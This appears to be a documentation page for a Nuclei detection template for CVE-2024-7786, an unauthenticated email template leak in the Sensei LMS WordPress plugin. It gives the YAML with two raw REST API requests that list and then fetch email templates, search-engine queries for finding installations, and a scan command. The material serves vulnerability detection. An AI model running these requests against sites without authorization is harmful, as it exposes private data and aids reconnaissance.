Skip to content
Nuclei Templates

Sensei LMS < 4.24.2 - Email Template Leak

ID: CVE-2024-7786

Severity: high

Author: s4e-io

Tags: cve,cve2024,wpscan,wp,wp-plugin,wordpress,sensei-lms,exposure

Description

Section titled “Description”

The Sensei LMS WordPress plugin before 4.24.2 does not properly protect some its REST API routes, allowing unauthenticated attackers to leak email templates.

YAML Source

Section titled “YAML Source”
id: CVE-2024-7786


info:
  name: Sensei LMS < 4.24.2 - Email Template Leak
  author: s4e-io
  severity: high
  description: |
    The Sensei LMS WordPress plugin before 4.24.2 does not properly protect some its REST API routes, allowing unauthenticated attackers to leak email templates.
  reference:
    - https://wpscan.com/vulnerability/f44e6f8f-3ef2-45c9-ae9c-9403305a548a/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-7786
    - https://www.usom.gov.tr/bildirim/tr-24-1387
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-7786
    epss-score: 0.00043
    epss-percentile: 0.09568
  metadata:
    max-request: 2
    verified: true
    vendor: automattic
    product: sensei-lms
    framework: wordpress
    publicwww-query: "/wp-content/plugins/sensei-lms"
    fofa-query: body="/wp-content/plugins/sensei-lms"
  tags: cve,cve2024,wpscan,wp,wp-plugin,wordpress,sensei-lms,exposure


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET /index.php/wp-json/wp/v2/sensei_email/ HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"id","date_gmt","slug")'
          - 'contains(content_type,"application/json")'
          - 'status_code == 200'
        condition: and
        internal: true


    extractors:
      - type: json
        part: body
        name: template_id
        json:
          - '.[0].id'
        internal: true


  - raw:
      - |
        GET /index.php/wp-json/wp/v2/sensei_email/{{template_id}} HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'sensei_email_preview_id={{template_id}}'
          - 'media?parent={{template_id}}'
        condition: and


      - type: word
        part: content_type
        words:
          - 'application/json'


      - type: status
        status:
          - 200
# digest: 4a0a00473045022010535188e1eed7e4c01482ae63ad1612b49d4b2d44a0ee89440bc566d3846dd4022100a1ad94601fe35ef1921b70ebc45ad82b9d80f973403dc7030f8254a77a05a4aa:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-7786.yaml"

View on Github